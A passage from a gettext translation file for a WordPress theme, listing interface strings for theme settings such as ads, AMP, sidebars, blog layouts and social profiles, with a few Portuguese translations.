Column" msgstr "" #: templates/single/templates.php:912 msgid "1 Comment" msgstr "1 Comentário" #: templates/entry.php:555 msgid "1 comment" msgstr "1 comentário" #: backend/panels/ads.php:480 backend/panels/newsletter.php:80 msgid "1 Day" msgstr "" #: backend/panels/ads.php:486 backend/panels/newsletter.php:86 msgid "1 Month" msgstr "" #: templates/single/templates.php:888 msgid "1 Review" msgstr "" #: templates/entry.php:617 msgid "1 View" msgstr "" #: backend/panels/ads.php:483 backend/panels/newsletter.php:83 msgid "1 Week" msgstr "" #: backend/configs.php:526 msgid "10px" msgstr "" #: backend/configs.php:527 msgid "14px" msgstr "" #: backend/panels/ads.php:241 msgid "15px" msgstr "" #: backend/configs.php:501 backend/mega-menu.php:48 #: backend/panels/header.php:130 msgid "2 Columns" msgstr "" #: backend/panels/ads.php:481 backend/panels/newsletter.php:81 msgid "2 Days" msgstr "" #: backend/panels/ads.php:484 backend/panels/newsletter.php:84 msgid "2 Weeks" msgstr "" #: backend/configs.php:528 msgid "20px" msgstr "" #: backend/configs.php:502 backend/mega-menu.php:49 #: backend/panels/header.php:131 msgid "3 Columns" msgstr "" #: backend/panels/footer.php:97 msgid "3 Columns (1/2/1)" msgstr "" #: backend/panels/ads.php:482 backend/panels/newsletter.php:82 msgid "3 Days" msgstr "" #: backend/panels/ads.php:485 backend/panels/newsletter.php:85 msgid "3 Weeks" msgstr "" #: backend/configs.php:529 msgid "30px" msgstr "" #: backend/configs.php:503 backend/mega-menu.php:50 #: backend/panels/header.php:132 msgid "4 Columns" msgstr "" #: backend/panels/footer.php:94 msgid "4 Columns (3/2/2/3)" msgstr "" #: backend/panels/ads.php:432 msgid "4,9" msgstr "" #: backend/panels/blog-pages.php:2375 msgid "404 Page" msgstr "" #: backend/configs.php:530 msgid "40px" msgstr "" #: backend/configs.php:504 backend/mega-menu.php:51 #: backend/panels/header.php:133 msgid "5 Columns" msgstr "" #: backend/panels/footer.php:95 msgid "5 Columns (1/1/1/1/1)" msgstr "" #: backend/panels/footer.php:96 msgid "5 Columns (40/15/15/15/15)" msgstr "" #: backend/configs.php:531 msgid "50px" msgstr "" #: backend/configs.php:505 msgid "6 Columns" msgstr "" #: backend/configs.php:532 msgid "60px" msgstr "" #: backend/configs.php:506 msgid "7 Columns" msgstr "" #: backend/configs.php:533 msgid "70px" msgstr "" #: backend/panels/newsletter.php:50 msgid "[mc4wp_form]" msgstr "" #: backend/panels/ads.php:471 backend/panels/blog-pages.php:63 #: backend/panels/blog-pages.php:629 backend/panels/blog-pages.php:1947 #: backend/panels/footer.php:121 backend/panels/header.php:62 msgid "[Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/footer.php:47 msgid "A dotted area for display at the left of the footer." msgstr "" #: includes/sidebars.php:58 msgid "A sidebar section of your site." msgstr "" #: templates/header/templates.php:758 msgid "Aa" msgstr "" #: backend/panels/heading.php:57 backend/panels/heading.php:142 msgid "Accent Heading Color" msgstr "" #: templates/popup.php:27 msgid "Accept" msgstr "Aceitar" #: backend/class-tgm-plugin-activation.php:2820 msgid "Activate" msgstr "" #: backend/class-tgm-plugin-activation.php:2708 #, php-format msgid "Activate %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2415 msgid "Active" msgstr "" #: backend/panels/ads.php:416 msgid "Ad Align" msgstr "" #: backend/panels/ads.php:409 msgid "Ad Description" msgstr "" #: backend/panels/ads.php:92 backend/panels/ads.php:97 #: backend/panels/ads.php:280 backend/panels/ads.php:285 msgid "Ad Type" msgstr "" #: backend/panels/adblock.php:29 msgid "AdBlock Detected" msgstr "" #: backend/panels/adblock.php:13 backend/panels/adblock.php:19 msgid "AdBlock Detector" msgstr "" #: templates/entry.php:553 msgid "Add a Comment" msgstr "" #: backend/panels/design.php:328 msgid "Add a Crop Size" msgstr "" #: backend/panels/newsletter.php:63 msgid "Add a link for the footer text (optional)." msgstr "" #: backend/panels/single-post.php:1403 msgid "Add a ruby template shortcode you would like to in this section.." msgstr "" #: backend/panels/sidebar.php:38 msgid "Add a Sidebar ID" msgstr "" #: backend/single-metaboxes.php:515 msgid "Add Criteria" msgstr "" #: templates/modules/category.php:20 msgid "Add More" msgstr "" #: backend/panels/woocommerce.php:228 msgid "Add to Cart Color" msgstr "" #: backend/panels/header.php:581 msgid "Adding a custom logo for the login form in the dark mode." msgstr "" #: backend/panels/header.php:573 msgid "" "Adding a custom logo for the login form. Leave blank to set it as the " "default." msgstr "" #: backend/panels/socials.php:16 msgid "Adding social profiles for your website." msgstr "" #: backend/panels/login.php:140 msgid "Admin Bar" msgstr "" #: backend/panels/ads.php:15 msgid "Ads & Slide Up" msgstr "" #: backend/panels/ads.php:30 msgid "Adsense - Auto Ads" msgstr "" #: backend/single-metaboxes.php:554 msgid "advantage item" msgstr "" #: backend/single-metaboxes.php:546 msgid "Advantages" msgstr "" #: backend/configs.php:378 msgid "After Entry Category" msgstr "" #: templates/entry.php:651 msgid "Ago" msgstr "" #: backend/panels/blog-pages.php:1510 msgid "" "Ajax pagination is only available for the tag. The theme will fallback to " "the numeric type for other archive pages." msgstr "" #: backend/panels/header.php:636 backend/panels/header.php:651 msgid "Alert Bar" msgstr "" #: backend/panels/header.php:666 msgid "Alert Content" msgstr "" #: backend/panels/header.php:673 msgid "Alert URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2482 #, php-format msgid "All (%s)" msgid_plural "All (%s)" msgstr[0] "" msgstr[1] "" #: backend/class-tgm-plugin-activation.php:3604 msgid "All installations and activations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:3612 msgid "All installations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:406 #, php-format msgid "All plugins installed and activated successfully. %1$s" msgstr "" #: backend/install-plugins.php:82 #, php-format msgid "All plugins installed and activated successfully. %s" msgstr "" #: backend/panels/ads.php:430 backend/panels/amp.php:590 msgid "Allow multiple positions, separated by commas. For example: 4,9" msgstr "" #: backend/panels/bookmark.php:52 msgid "Allow or disallow guest users can bookmark posts." msgstr "" #: backend/panels/ads.php:487 msgid "Always Display" msgstr "" #: backend/panels/amp.php:28 msgid "AMP" msgstr "" #: backend/panels/amp.php:277 msgid "AMP Ads" msgstr "" #: backend/panels/amp.php:247 msgid "AMP Auto Ads" msgstr "" #: backend/panels/amp.php:261 msgid "AMP Auto Ads Code" msgstr "" #: backend/panels/amp.php:304 backend/panels/amp.php:364 #: backend/panels/amp.php:424 backend/panels/amp.php:485 #: backend/panels/amp.php:545 msgid "AMP Custom Script Ad" msgstr "" #: backend/panels/amp.php:62 msgid "AMP Debug" msgstr "" #: backend/panels/amp.php:91 msgid "AMP Footer Logo" msgstr "" #: backend/panels/header.php:244 msgid "AMP Header - Search Icon" msgstr "" #: backend/panels/amp.php:83 msgid "amp_footer Settings" msgstr "" #: backend/class-tgm-plugin-activation.php:3595 #, php-format msgid "An error occurred while installing %1$s: %2$s." msgstr "" #: backend/panels/reaction.php:46 msgid "Angry" msgstr "" #: backend/panels/typography.php:1096 msgid "Archive & Menu Widgets" msgstr "" #: backend/panels/breadcrumb.php:94 msgid "Archive Breadcrumb" msgstr "" #: backend/panels/blog-pages.php:1487 msgid "Archive Header" msgstr "" #: backend/panels/woocommerce.php:116 msgid "Archive Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:108 msgid "Archive Sidebar Position" msgstr "" #: templates/blog.php:476 templates/modules/category.php:74 #: templates/modules/category.php:134 templates/modules/category.php:197 #: templates/modules/category.php:270 templates/modules/category.php:337 msgid "Article" msgstr "" #: backend/panels/optimized.php:152 msgid "Article Markup" msgstr "" #: backend/single-metaboxes.php:858 msgid "Article Schema Markup" msgstr "" #: templates/blog.php:478 templates/modules/category.php:72 #: templates/modules/category.php:132 templates/modules/category.php:195 #: templates/modules/category.php:268 templates/modules/category.php:335 msgid "Articles" msgstr "Postagens" #: backend/panels/header.php:610 msgid "" "Assign a menu for displaying when hovering on the login icon if user logged." msgstr "" #: backend/category-settings.php:303 backend/panels/blog-pages.php:313 #: backend/panels/blog-pages.php:800 backend/panels/blog-pages.php:1214 #: backend/panels/blog-pages.php:1622 backend/panels/blog-pages.php:2114 #: backend/panels/bookmark.php:216 backend/panels/bookmark.php:664 #: backend/panels/page.php:74 backend/panels/single-post.php:433 #: backend/panels/single-post.php:1457 backend/single-metaboxes.php:97 #: backend/single-metaboxes.php:456 msgid "Assign a Sidebar" msgstr "" #: backend/single-metaboxes.php:98 msgid "" "Assign a sidebar for this page. It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:457 msgid "" "Assign a sidebar for this post. It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/panels/single-post.php:434 msgid "" "Assign a sidebar if you select a single layout which has the sidebar. You " "can set an individual sidebar for each post in the post editor page." msgstr "" #: backend/panels/single-post.php:1458 msgid "" "Assign a special sidebar for all next load posts, Recommended use simple or " "advert content." msgstr "" #: backend/category-settings.php:304 backend/panels/blog-pages.php:314 #: backend/panels/blog-pages.php:801 backend/panels/blog-pages.php:1215 #: backend/panels/blog-pages.php:1623 backend/panels/blog-pages.php:2115 #: backend/panels/bookmark.php:217 msgid "" "Assign a widget section for the sidebar for the latest blog section if it is " "enabled." msgstr "" #: backend/panels/page.php:75 msgid "" "Assign a widget section for the sidebar for the single page if it is enabled." msgstr "" #: backend/panels/bookmark.php:665 msgid "" "Assign a widget section for the sidebar for this section if it is enabled." msgstr "" #: backend/mega-menu.php:162 msgid "" "Assign this sidebar (Appearance > Widgets) as this mega menu. Each widget is " "added will be corresponding to a column." msgstr "" #: backend/panels/design.php:306 msgid "" "Assigning correct size for layouts is important for the look and give the " "best performance of your website.." msgstr "" #: backend/panels/single-post.php:839 msgid "At Bottom of Post Content" msgstr "" #: backend/panels/single-post.php:700 msgid "At the Top" msgstr "" #: backend/mega-menu.php:245 msgid "Attachment/SVG URL" msgstr "" #: backend/single-metaboxes.php:258 msgid "Attribution" msgstr "" #: backend/single-metaboxes.php:371 msgid "Audio Format" msgstr "" #: backend/panels/design.php:491 msgid "Audio Icon" msgstr "" #: backend/panels/design.php:515 msgid "Audio Icon Color" msgstr "" #: backend/single-metaboxes.php:377 msgid "Audio Layout" msgstr "" #: backend/panels/single-post.php:97 msgid "Audio Post Format Layout" msgstr "" #: backend/panels/single-post.php:103 msgid "Audio Post Layout" msgstr "" #: backend/single-metaboxes.php:386 msgid "Audio URL" msgstr "" #: backend/panels/blog-pages.php:1063 msgid "Author" msgstr "" #: backend/configs.php:402 backend/panels/design.php:268 msgid "author (Author)" msgstr "" #: backend/panels/blog-pages.php:1077 msgid "Author Bio" msgstr "" #: backend/panels/breadcrumb.php:83 msgid "Author Breadcrumb" msgstr "" #: backend/panels/amp.php:195 backend/panels/single-post.php:383 msgid "Author Card" msgstr "" #: backend/panels/single-post.php:377 msgid "Author Card & Next/Prev Pagination" msgstr "" #: backend/panels/blog-pages.php:1072 msgid "Author Header" msgstr "" #: backend/panels/single-post.php:600 msgid "Author Job" msgstr "" #: backend/panels/amp.php:257 msgid "" "Auto ads for AMP automatically place AdSense Auto ads on your AMP pages. " "Google will automatically show ads on your AMP pages at optimal times when " "they are likely to perform well and provide a good experience." msgstr "" #: backend/panels/ads.php:31 msgid "" "Auto ads will scan your site and automatically place ads where they are " "likely to perform well and potentially generate more revenue." msgstr "" #: backend/panels/ads.php:49 msgid "Auto Adsense Ads Code" msgstr "" #: backend/panels/single-post.php:1424 backend/panels/single-post.php:1433 #: backend/single-metaboxes.php:820 msgid "Auto Load Next Posts" msgstr "" #: backend/panels/design.php:426 msgid "Auto Play Next Slides" msgstr "" #: backend/panels/design.php:435 msgid "Auto Play Speed" msgstr "" #: backend/panels/single-post.php:111 backend/single-metaboxes.php:404 msgid "Autoplay Audio" msgstr "" #: backend/panels/single-post.php:112 msgid "Autoplay the featured audio when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:75 msgid "Autoplay the featured video when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:74 backend/single-metaboxes.php:356 msgid "Autoplay Video" msgstr "" #: backend/class-tgm-plugin-activation.php:2604 msgid "Available version:" msgstr "" #: backend/configs.php:401 msgid "avatar (Avatar)" msgstr "" #: backend/category-settings.php:482 backend/category-settings.php:490 #: backend/panels/blog-pages.php:506 backend/panels/blog-pages.php:514 #: backend/panels/blog-pages.php:993 backend/panels/blog-pages.php:1001 #: backend/panels/blog-pages.php:1407 backend/panels/blog-pages.php:1415 #: backend/panels/blog-pages.php:1815 backend/panels/blog-pages.php:1823 #: backend/panels/blog-pages.php:2307 backend/panels/blog-pages.php:2315 #: backend/panels/bookmark.php:405 backend/panels/bookmark.php:853 #: backend/panels/bookmark.php:861 backend/panels/single-post.php:610 msgid "avatar,author" msgstr "" #: backend/category-settings.php:360 msgid "avatar,author,date" msgstr "" #: templates/single/review-comment.php:92 msgid "Average" msgstr "" #: backend/panels/amp.php:145 backend/panels/amp.php:151 #: backend/panels/general.php:25 msgid "Back to Top" msgstr "" #: backend/configs.php:873 msgid "Background" msgstr "" #: backend/configs.php:289 backend/configs.php:320 msgid "Background 1" msgstr "" #: backend/configs.php:290 backend/configs.php:321 msgid "Background 1 (Big)" msgstr "" #: backend/configs.php:291 backend/configs.php:322 msgid "Background 2" msgstr "" #: backend/configs.php:292 backend/configs.php:323 msgid "Background 2 (Big)" msgstr "" #: backend/configs.php:293 backend/configs.php:324 msgid "Background 3" msgstr "" #: backend/configs.php:294 backend/configs.php:325 msgid "Background 3 (Big)" msgstr "" #: backend/configs.php:295 backend/configs.php:326 msgid "Background 4" msgstr "" #: backend/configs.php:296 backend/configs.php:327 msgid "Background 4 (Big)" msgstr "" #: backend/panels/header-style.php:191 backend/panels/header.php:682 #: backend/panels/privacy.php:40 msgid "Background Color" msgstr "" #: backend/mega-menu.php:222 msgid "Background color" msgstr "" #: backend/panels/general.php:49 msgid "Backup all your settings to a file or restore your settings." msgstr "" #: templates/single/reviews.php:189 msgid "Bad Stuff" msgstr "" #: backend/configs.php:843 msgid "Banner (468x60)" msgstr "" #: backend/panels/single-post.php:1761 msgid "Bar Color" msgstr "" #: backend/panels/single-post.php:1753 msgid "Bar Height" msgstr "" #: backend/panels/single-post.php:350 msgid "" "Be keep up! Get the latest breaking news delivered straight to your inbox." msgstr "" #: backend/class-tgm-plugin-activation.php:393 backend/install-plugins.php:79 msgid "Begin activating plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:383 backend/install-plugins.php:78 msgid "Begin installing plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:388 msgid "Begin updating plugin" msgstr "" #: backend/panels/design.php:355 msgid "" "Below is the list of image sizes. Enable or disable any size you would like." msgstr "" #: backend/panels/single-post.php:576 msgid "Big Avatar" msgstr "" #: backend/configs.php:858 msgid "Billboard (970x250)" msgstr "" #: backend/panels/typography.php:1030 msgid "Block Heading" msgstr "" #: backend/panels/typography.php:806 backend/panels/typography.php:812 msgid "Block Quote" msgstr "" #: backend/panels/blog-pages.php:571 msgid "Blog & Archive" msgstr "" #: backend/category-settings.php:323 backend/panels/blog-pages.php:340 #: backend/panels/blog-pages.php:827 backend/panels/blog-pages.php:1241 #: backend/panels/blog-pages.php:1649 backend/panels/blog-pages.php:2141 #: backend/panels/bookmark.php:243 backend/panels/bookmark.php:691 msgid "Blog Design" msgstr "" #: backend/panels/blog-pages.php:588 msgid "Blog Index" msgstr "" #: backend/panels/blog-pages.php:250 backend/panels/blog-pages.php:731 #: backend/panels/blog-pages.php:737 backend/panels/blog-pages.php:1145 #: backend/panels/blog-pages.php:1151 backend/panels/blog-pages.php:1553 #: backend/panels/blog-pages.php:1559 backend/panels/blog-pages.php:2045 #: backend/panels/blog-pages.php:2051 backend/panels/bookmark.php:149 #: backend/panels/bookmark.php:154 backend/panels/bookmark.php:594 #: backend/panels/single-post.php:1336 msgid "Blog Layout" msgstr "" #: backend/category-settings.php:238 msgid "Blog Listing Layout" msgstr "" #: backend/mega-menu.php:135 msgid "Blog Listing Layout: " msgstr "" #: backend/panels/blog-pages.php:1442 backend/panels/blog-pages.php:1850 #: backend/panels/blog-pages.php:2342 backend/panels/bookmark.php:556 msgid "Blog Pagination" msgstr "" #: backend/panels/blog-pages.php:785 backend/panels/blog-pages.php:1199 #: backend/panels/blog-pages.php:1607 backend/panels/blog-pages.php:2099 #: backend/panels/bookmark.php:202 backend/panels/bookmark.php:650 msgid "Blog Sidebar" msgstr "" #: templates/parts.php:624 msgid "Bloglovin" msgstr "" #: backend/panels/socials.php:98 msgid "Bloglovin URL" msgstr "" #: backend/panels/typography.php:35 msgid "Body Font" msgstr "" #: backend/panels/single-post.php:209 msgid "Bold" msgstr "" #: backend/panels/single-post.php:210 msgid "Bold Italic" msgstr "" #: backend/category-settings.php:389 backend/panels/block-classic.php:81 #: backend/panels/block-grid.php:81 backend/panels/block-grid.php:246 #: backend/panels/block-grid.php:411 backend/panels/block-grid.php:584 #: backend/panels/block-grid.php:771 backend/panels/block-list.php:89 #: backend/panels/block-list.php:262 backend/panels/block-list.php:443 #: backend/panels/block-list.php:638 backend/panels/blog-pages.php:416 #: backend/panels/blog-pages.php:903 backend/panels/blog-pages.php:1317 #: backend/panels/blog-pages.php:1725 backend/panels/blog-pages.php:2217 #: backend/panels/bookmark.php:315 backend/panels/bookmark.php:763 msgid "Bookmark Icon" msgstr "" #: backend/panels/bookmark.php:14 backend/panels/bookmark.php:37 msgid "Bookmark System" msgstr "" #: backend/panels/logo.php:149 msgid "Bookmarklet" msgstr "" #: backend/configs.php:330 backend/configs.php:874 msgid "Border" msgstr "" #: backend/configs.php:331 msgid "Border (Big)" msgstr "" #: backend/panels/header-style.php:621 msgid "Border Top & Bottom Shadow" msgstr "" #: backend/panels/amp.php:481 msgid "Bottom - Ad Type" msgstr "" #: backend/panels/amp.php:509 msgid "Bottom - Adsense Size" msgstr "" #: backend/panels/amp.php:521 msgid "Bottom - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:493 msgid "Bottom - Data Ad Client" msgstr "" #: backend/panels/amp.php:501 msgid "Bottom - Data Ad Slot" msgstr "" #: backend/panels/blog-pages.php:658 msgid "Bottom Area Template Shortcode" msgstr "" #: backend/configs.php:334 backend/panels/blog-pages.php:51 #: backend/panels/blog-pages.php:617 backend/panels/blog-pages.php:1935 #: backend/panels/header-style.php:72 backend/panels/header-style.php:617 #: backend/single-metaboxes.php:134 backend/single-metaboxes.php:911 msgid "Bottom Border" msgstr "" #: backend/configs.php:335 msgid "Bottom Border (Big)" msgstr "" #: backend/panels/single-post.php:845 msgid "Bottom Content Share Bar" msgstr "" #: backend/configs.php:332 msgid "Bottom Dotted" msgstr "" #: backend/configs.php:333 msgid "Bottom Dotted (Big)" msgstr "" #: backend/single-metaboxes.php:692 msgid "Bottom Entry Widgets Area" msgstr "" #: backend/panels/single-post.php:327 backend/panels/single-post.php:333 msgid "Bottom Newsletter" msgstr "" #: backend/configs.php:374 msgid "Bottom Right" msgstr "" #: backend/configs.php:375 msgid "Bottom Right (Big Icon)" msgstr "" #: backend/panels/amp.php:475 msgid "Bottom Single Content Ad Settings" msgstr "" #: backend/panels/block-grid.php:672 backend/panels/block-grid.php:859 #: backend/panels/block-list.php:524 backend/panels/block-list.php:719 msgid "Box Color" msgstr "" #: backend/panels/privacy.php:21 msgid "Box Position" msgstr "" #: backend/panels/block-grid.php:526 backend/panels/block-grid.php:713 #: backend/panels/block-list.php:377 backend/panels/block-list.php:572 msgid "Box Style" msgstr "" #: backend/panels/block-grid.php:522 backend/panels/block-grid.php:709 #: backend/panels/block-list.php:373 backend/panels/block-list.php:568 msgid "boxed grid" msgstr "" #: backend/category-settings.php:246 backend/configs.php:459 #: backend/panels/block-grid.php:512 msgid "Boxed Grid 1" msgstr "" #: backend/category-settings.php:247 backend/configs.php:463 #: backend/panels/block-grid.php:699 msgid "Boxed Grid 2" msgstr "" #: backend/category-settings.php:251 backend/configs.php:479 #: backend/panels/block-list.php:363 msgid "Boxed List 1" msgstr "" #: backend/category-settings.php:252 backend/configs.php:483 #: backend/panels/block-list.php:558 msgid "Boxed List 2" msgstr "" #: backend/category-settings.php:100 backend/panels/typography.php:845 msgid "Breadcrumb" msgstr "" #: backend/panels/breadcrumb.php:14 backend/panels/breadcrumb.php:30 msgid "Breadcrumb Bar" msgstr "" #: backend/panels/color.php:140 msgid "Breadcrumb Color" msgstr "" #: backend/panels/typography.php:853 msgid "Breadcrumb Font" msgstr "" #: backend/install-plugins.php:43 msgid "Breadcrumb NavXT" msgstr "" #: backend/panels/optimized.php:138 msgid "" "Breadcrumbs are a hierarchy of links displayed in search engines and your " "website. This option requests the \"Breadcrumb NavXT\"." msgstr "" #: backend/panels/optimized.php:137 msgid "Breadcrumbs bar" msgstr "" #: backend/single-metaboxes.php:744 msgid "Break Page Selection" msgstr "" #: backend/configs.php:845 msgid "Button (125x125)" msgstr "" #: backend/panels/typography.php:636 msgid "Button Font" msgstr "" #: backend/panels/typography.php:630 msgid "Button Font Settings" msgstr "" #: backend/panels/ads.php:512 msgid "Button Text Color" msgstr "" #: backend/panels/single-post.php:488 msgid "" "By default, Primary category setting will only apply to the post listing." msgstr "" #: backend/panels/privacy.php:35 msgid "" "By using this site, you agree to the Privacy Policy and Terms of Use." msgstr "" #: backend/panels/design.php:453 msgid "Carousel Free Scroll" msgstr "" #: backend/panels/blog-pages.php:17 msgid "Category" msgstr "" #: backend/configs.php:404 backend/panels/design.php:270 msgid "category (Categories)" msgstr "" #: backend/panels/breadcrumb.php:72 msgid "Category Breadcrumb" msgstr "" #: templates/parts.php:756 msgid "category featured" msgstr "" #: backend/category-settings.php:73 backend/category-settings.php:78 #: backend/panels/blog-pages.php:77 backend/panels/blog-pages.php:82 msgid "Category Header" msgstr "" #: backend/mega-menu.php:120 msgid "Category Mega Menu" msgstr "" #: backend/panels/design.php:145 msgid "Category Meta Icon" msgstr "" #: backend/configs.php:379 backend/panels/login.php:41 msgid "Center" msgstr "" #: backend/configs.php:380 msgid "Center (Big Icon)" msgstr "" #: backend/panels/header.php:344 msgid "Center Logo" msgstr "" #: backend/panels/amp.php:110 backend/panels/footer.php:171 msgid "Centered Mode" msgstr "" #: backend/panels/block-classic.php:163 backend/panels/block-grid.php:163 #: backend/panels/block-grid.php:328 backend/panels/block-grid.php:493 #: backend/panels/block-grid.php:666 backend/panels/block-grid.php:853 #: backend/panels/block-list.php:171 backend/panels/block-list.php:344 #: backend/panels/block-list.php:539 backend/panels/block-list.php:734 msgid "Centering Content" msgstr "" #: backend/panels/block-classic.php:164 backend/panels/block-grid.php:164 #: backend/panels/block-grid.php:329 backend/panels/block-grid.php:494 #: backend/panels/block-grid.php:667 backend/panels/block-grid.php:854 #: backend/panels/block-list.php:172 backend/panels/block-list.php:345 #: backend/panels/block-list.php:540 backend/panels/block-list.php:735 msgid "Centering text and elements for the post listing." msgstr "" #: backend/panels/amp.php:111 backend/panels/footer.php:172 msgid "Centering this section." msgstr "" #: backend/panels/block-classic.php:27 msgid "classic" msgstr "" #: backend/category-settings.php:243 backend/configs.php:447 #: backend/panels/block-classic.php:17 msgid "Classic (Standard)" msgstr "" #: backend/panels/sidebar.php:40 msgid "" "Click on the \"Create Sidebar\" button, then input a name/ID (without " "special charsets and spacing) into the field to create a new sidebar." msgstr "" #: backend/panels/sidebar.php:41 msgid "Click then Input ID to Create a Sidebar" msgstr "" #: backend/panels/header.php:367 msgid "Collapse Section" msgstr "" #: backend/panels/header.php:440 backend/panels/header.php:493 msgid "Collapse Section - Text Color" msgstr "" #: backend/panels/header.php:429 backend/panels/header.php:482 msgid "Collapse Section Background" msgstr "" #: backend/mega-menu.php:218 msgid "Color" msgstr "" #: backend/panels/header.php:321 msgid "" "Color settings will apply to the tablet and mobile header. Leave blank to " "set as the desktop navigation colors." msgstr "" #: backend/panels/single-post.php:714 backend/panels/single-post.php:853 #: backend/panels/single-post.php:991 backend/panels/single-post.php:1612 msgid "Colorful Icons" msgstr "" #: backend/panels/footer.php:106 msgid "Column Border" msgstr "" #: backend/mega-menu.php:161 msgid "Column Mega Menu" msgstr "" #: backend/category-settings.php:282 backend/panels/blog-pages.php:282 #: backend/panels/blog-pages.php:769 backend/panels/blog-pages.php:1183 #: backend/panels/blog-pages.php:1591 backend/panels/blog-pages.php:2083 #: backend/panels/bookmark.php:186 backend/panels/bookmark.php:626 #: backend/panels/bookmark.php:634 msgid "Columns Gap" msgstr "" #: backend/category-settings.php:258 backend/panels/blog-pages.php:258 #: backend/panels/blog-pages.php:745 backend/panels/blog-pages.php:1567 #: backend/panels/blog-pages.php:2059 backend/panels/bookmark.php:162 msgid "Columns on Desktop" msgstr "" #: backend/category-settings.php:274 backend/panels/blog-pages.php:274 #: backend/panels/blog-pages.php:761 backend/panels/blog-pages.php:1175 #: backend/panels/blog-pages.php:1583 backend/panels/blog-pages.php:2075 #: backend/panels/bookmark.php:178 backend/panels/bookmark.php:618 msgid "Columns on Mobile" msgstr "" #: backend/category-settings.php:266 backend/panels/blog-pages.php:266 #: backend/panels/blog-pages.php:753 backend/panels/blog-pages.php:1167 #: backend/panels/blog-pages.php:1575 backend/panels/blog-pages.php:2067 #: backend/panels/bookmark.php:170 backend/panels/bookmark.php:610 msgid "Columns on Tablet" msgstr "" #: backend/mega-menu.php:181 backend/panels/blog-pages.php:1159 #: backend/panels/bookmark.php:602 backend/panels/header.php:126 msgid "Columns per Row" msgstr "" #: backend/configs.php:407 backend/panels/design.php:273 msgid "comment (Comments)" msgstr "" #: backend/panels/amp.php:213 msgid "Comment Box" msgstr "" #: backend/panels/design.php:124 msgid "Comment Meta Icon" msgstr "" #: backend/panels/single-post.php:1203 msgid "Comments" msgstr "Comentários" #: comments.php:32 msgid "Comments are closed." msgstr "" #: backend/panels/privacy.php:33 msgid "Content" msgstr "" #: backend/panels/single-post.php:155 msgid "Content Area" msgstr "" #: backend/panels/typography.php:722 msgid "Content Font Size (Small Headline)" msgstr "" #: backend/panels/typography.php:779 msgid "Content Font Size (Small Tagline)" msgstr "" #: backend/panels/table-contents.php:134 msgid "Contents" msgstr "" #: templates/single/next-posts.php:43 msgid "Continue Reading" msgstr "" #: backend/panels/single-post.php:813 backend/panels/single-post.php:952 #: backend/panels/single-post.php:1090 msgid "Copy Link" msgstr "" #: backend/panels/footer.php:207 msgid "Copyright - Font Size" msgstr "" #: backend/panels/footer.php:199 msgid "Copyright Menu" msgstr "" #: backend/panels/footer.php:213 msgid "Copyright Menu - Font Size" msgstr "" #: backend/panels/amp.php:124 backend/panels/amp.php:130 #: backend/panels/footer.php:185 msgid "Copyright Section" msgstr "" #: backend/panels/footer.php:191 msgid "Copyright Text" msgstr "" #: backend/panels/newsletter.php:71 msgid "Cover Image" msgstr "" #: backend/panels/design.php:331 msgid "Create a New Crop Size" msgstr "" #: backend/panels/sidebar.php:39 msgid "Create new or delete exist sidebars." msgstr "" #: backend/single-metaboxes.php:516 msgid "Create your review criteria based on the type you choose." msgstr "" #: backend/single-metaboxes.php:523 msgid "Criteria" msgstr "" #: backend/panels/design.php:313 msgid "Crop Position" msgstr "" #: backend/panels/reaction.php:51 msgid "Cry" msgstr "" #: backend/single-metaboxes.php:598 msgid "Currency" msgstr "" #: backend/configs.php:410 msgid "custom (Custom)" msgstr "" #: backend/category-settings.php:351 msgid "Custom Below" msgstr "" #: backend/panels/single-post.php:647 msgid "Custom date format for the last updated info." msgstr "" #: backend/panels/design.php:230 backend/single-metaboxes.php:283 #: backend/single-metaboxes.php:289 msgid "Custom Entry Meta" msgstr "" #: backend/category-settings.php:336 backend/panels/blog-pages.php:358 #: backend/panels/blog-pages.php:845 backend/panels/blog-pages.php:1259 #: backend/panels/blog-pages.php:1667 backend/panels/blog-pages.php:2159 #: backend/panels/bookmark.php:258 backend/panels/bookmark.php:706 msgid "Custom Featured Ratio" msgstr "" #: backend/panels/header.php:602 msgid "Custom Forget Password URL" msgstr "" #: backend/panels/ads.php:102 backend/panels/ads.php:291 msgid "Custom Image" msgstr "" #: backend/panels/ads.php:193 backend/panels/ads.php:382 msgid "Custom Image - Ad Destination" msgstr "" #: backend/panels/ads.php:179 backend/panels/ads.php:368 msgid "Custom Image - Ad Image" msgstr "" #: backend/panels/ads.php:186 backend/panels/ads.php:375 msgid "Custom Image - Dark Mode Ad Image" msgstr "" #: backend/panels/ads.php:200 backend/panels/ads.php:389 msgid "Custom Image - Max Width" msgstr "" #: backend/panels/ads.php:173 backend/panels/ads.php:362 msgid "Custom Image Settings" msgstr "" #: backend/panels/login.php:25 msgid "Custom Login Screen" msgstr "" #: backend/panels/header.php:595 msgid "Custom Register URL" msgstr "" #: backend/panels/design.php:685 msgid "Custom Round Corner" msgstr "" #: backend/panels/header.php:231 msgid "Custom Search SVG" msgstr "" #: backend/category-settings.php:402 backend/configs.php:210 msgid "Custom Settings Below" msgstr "" #: backend/panels/ads.php:135 backend/panels/ads.php:324 msgid "Custom Size Below" msgstr "" #: backend/panels/socials.php:198 msgid "Custom Social 1 - Color" msgstr "" #: backend/panels/socials.php:189 msgid "Custom Social 1 - Icon" msgstr "" #: backend/panels/socials.php:183 msgid "Custom Social 1 - Name" msgstr "" #: backend/panels/socials.php:177 msgid "Custom social 1 - URL" msgstr "" #: backend/panels/socials.php:225 msgid "Custom Social 2 - Color" msgstr "" #: backend/panels/socials.php:216 msgid "Custom Social 2 - Icon" msgstr "" #: backend/panels/socials.php:210 msgid "Custom Social 2 - Name" msgstr "" #: backend/panels/socials.php:204 msgid "Custom social 2 - URL" msgstr "" #: backend/panels/socials.php:252 msgid "Custom Social 3 - Color" msgstr "" #: backend/panels/socials.php:243 msgid "Custom Social 3 - Icon" msgstr "" #: backend/panels/socials.php:237 msgid "Custom Social 3 - Name" msgstr "" #: 